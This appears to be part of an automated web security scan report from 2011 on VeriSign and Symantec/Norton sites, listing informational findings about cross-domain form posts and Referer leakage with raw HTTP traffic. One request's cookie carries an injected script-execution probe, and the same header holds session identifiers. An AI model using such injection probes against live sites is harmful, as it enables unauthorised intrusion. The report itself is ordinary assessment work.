Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...

13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.6. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.7. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...

13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...

13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale
submit

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="sbmodulebody">


                               <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post">
                                   Order Number<sup>
...[SNIP]...

13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...

13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.15. http://query.verisign.ch/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.16. http://query.verisign.ch/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.17. https://renewals.symantec.com/renewals/chat_form.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/chat_form.jsp

Issue detail

The page contains a form which POSTs data to the domain admin.instantservice.com. The form contains the following fields:

ai
di
it
optionaldata
fname
lname
optionaldata2
company_size
company_size
company_size
company_size
company_size
company_size
company_size
email
phone
optionaldata1

Request

GET /renewals/chat_form.jsp HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:39:05 GMT
Content-Type: text/html
Content-Length: 15726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">





<html>
<head><ti
...[SNIP]...
<body>

<FORM action="https://admin.instantservice.com/Customer" method="post" name="custform">

<INPUT TYPE="HIDDEN" NAME="ai" VALUE="6227">
...[SNIP]...

13.18. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

Response

13.19. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

Response

13.20. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

Response

13.21. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

Response

13.22. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

Response

13.23. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

Response

13.24. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

Response

13.25. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

Response

14. Cross-domain Referer leakage previous next
There are 70 instances of this issue:

http://blogs.verisign.com/
http://buy.norton.com/estore/mf/landingProductFeatures
http://buy.norton.com/estore/mf/upgradeRenewal
http://community.norton.com/norton/
http://investor.symantec.com/phoenix.zhtml
http://investor.symantec.com/phoenix.zhtml
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
https://knowledge.verisign.com/support/code-signing-support/index
https://knowledge.verisign.com/support/code-signing-support/index.html
https://knowledge.verisign.com/support/digital-id-support/index.html
https://knowledge.verisign.com/support/eca-support/index.html
https://knowledge.verisign.com/support/mpki-for-ssl-support/index
https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
https://knowledge.verisign.com/support/mpki-support/index.html
https://knowledge.verisign.com/support/ssl-certificates-support/index
https://knowledge.verisign.com/support/ssl-certificates-support/index.html
https://knowledge.verisign.com/support/trust-seal-support/index.html
https://onlinefamily.norton.com/familysafety/loginStart.fs
http://player.ooyala.com/player.js
http://query.verisign.com/search
http://searchg.symantec.com/search
https://securitycenter.verisign.com/celp/enroll/outsideSearch
http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/console_login
http://store.symantec.com/
https://symantec-corporation.com/servlet/campaignrespondent
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/trust_product_selector
http://updatecenter.norton.com/
http://us.norton.com/beta/index.jsp
http://us.norton.com/beta/overview.jsp
http://us.norton.com/norton-utilities/
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/products/charts/comparison.jsp
http://us.norton.com/support/DIY/index.jsp
http://us.norton.com/support/dtree.jsp
http://us.norton.com/theme.jsp
http://us.norton.com/theme.jsp
http://us.norton.com/theme4.jsp
http://www.symantec.com/business/products/categories.jsp
http://www.symantec.com/business/products/purchasing.jsp
http://www.symantec.com/business/theme.jsp
http://www.symantec.com/business/verisign/fraud-detection-service
http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp
http://www.symantec.com/store/products/index.jsp
http://www.symantec.com/store/resources/index.jsp
http://www.symantec.com/store/services/index.jsp
http://www.verisign.ch/
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/verisign-worldwide/index.html

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

14.1. http://blogs.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://blogs.verisign.com/?tid=footer

The response contains the following links to other domains:

http://feeds.feedburner.com/WebUserExperienceBlog
http://www.symantec.com/
http://www.symantec.com/connect/blogs/authentication-business
http://www.symantec.com/connect/blogs/authentication-user
http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all
http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 20:19:01 GMT
ETag: "1a606f6-9f7a-c8827740"
Accept-Ranges: bytes
Content-Length: 40826
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <
...[SNIP]...
<li><a href="http://www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="http://www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="http://www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="http://www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="http://www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="http://www.verisign.in/">India</a>
...[SNIP]...
<li><a href="http://www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="http://www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="http://www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="http://www.verisign.ch/">Switzerland</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-user" class="blueContentTitle">User Authentication Blog</a>
...[SNIP]...
<div class="images">
                               <a href="http://www.symantec.com/connect/blogs/authentication-user"><img src="//www.verisign.com/images/symc-blogs.jpg" alt="User Authentication Blog" /></a>
                               <a href="http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
<p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-business" class="blueContentTitle">Business Authentication Blog</a>
...[SNIP]...
<div class="images">
                               <a href="http://www.symantec.com/connect/blogs/authentication-business"><img src="//www.verisign.com/images/symc-blogs.jpg" alt="Business Authentication Blog" /></a>
                               <a href="http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
</a>
                               <a href="http://feeds.feedburner.com/WebUserExperienceBlog"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href="http://www.symantec.com" rel="external">Symantec Corp.</a>
...[SNIP]...

14.2. http://buy.norton.com/estore/mf/landingProductFeatures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/estore/mf/landingProductFeatures

Issue detail

The page was loaded from a URL containing a query string:

http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508

The response contains the following links to other domains:

http://store.symantec.com/?inid=us_estore
http://www.mynortonaccount.com/
http://www.symantec.com/about
http://www.symantec.com/about/profile/policies/eulas
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/business
http://www.symantec.com/feedback/
http://www.symantec.com/home_homeoffice/support/special/upgrade2007/
http://www.symantec.com/norton
http://www.symantec.com/norton/downloads/index.jsp
http://www.symantec.com/partners
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...
<div id="globalNavMainInner1">
<a href="http://www.symantec.com/norton">Norton</a>
...[SNIP]...
<div id="globalNavMainInner2">
<a href="http://www.symantec.com/business">Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href="http://www.symantec.com/partners">Partners</a>
...[SNIP]...
<div id="globalNavMainInner5">
<a href="http://www.symantec.com/about">About Symantec</a>
...[SNIP]...
<div class="lftNavMainNav">
<a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"><span>
...[SNIP]...
<div class="lftNavMainNav">
<a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN">Find My Order </a>
...[SNIP]...
<li>
<a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/">Norton Update Center</a>
...[SNIP]...
<div class="verisign">
<a target="_blank" title="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en">
<img title="Verisign" src="//buy-static.norton.com/estore/images//en/Non-Product/Logo/partner_logo/logo_verisign.png">
...[SNIP]...
<div class="            medBusinessUpgrade positioning
   ">
                       <a href="http://store.symantec.com/?inid=us_estore">
                           <img width="718" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_protectyourbiz_718.png">
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span><a target="_blank" href="http://www.myNortonAccount.com ">Norton Account</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas">License Agreements </a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/">Contact Us</a>
...[SNIP]...

14.3. http://buy.norton.com/estore/mf/upgradeRenewal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeRenewal

Issue detail

The page was loaded from a URL containing a query string:

http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199

The response contains the following links to other domains:

http://www.mynortonaccount.com/
http://www.symantec.com/about
http://www.symantec.com/about/profile/policies/eulas
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/business
http://www.symantec.com/feedback/
http://www.symantec.com/home_homeoffice/support/special/upgrade2007/
http://www.symantec.com/norton
http://www.symantec.com/norton/downloads/index.jsp
http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN
http://www.symantec.com/partners
https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...
<div id="globalNavMainInner1">
<a href="http://www.symantec.com/norton">Norton</a>
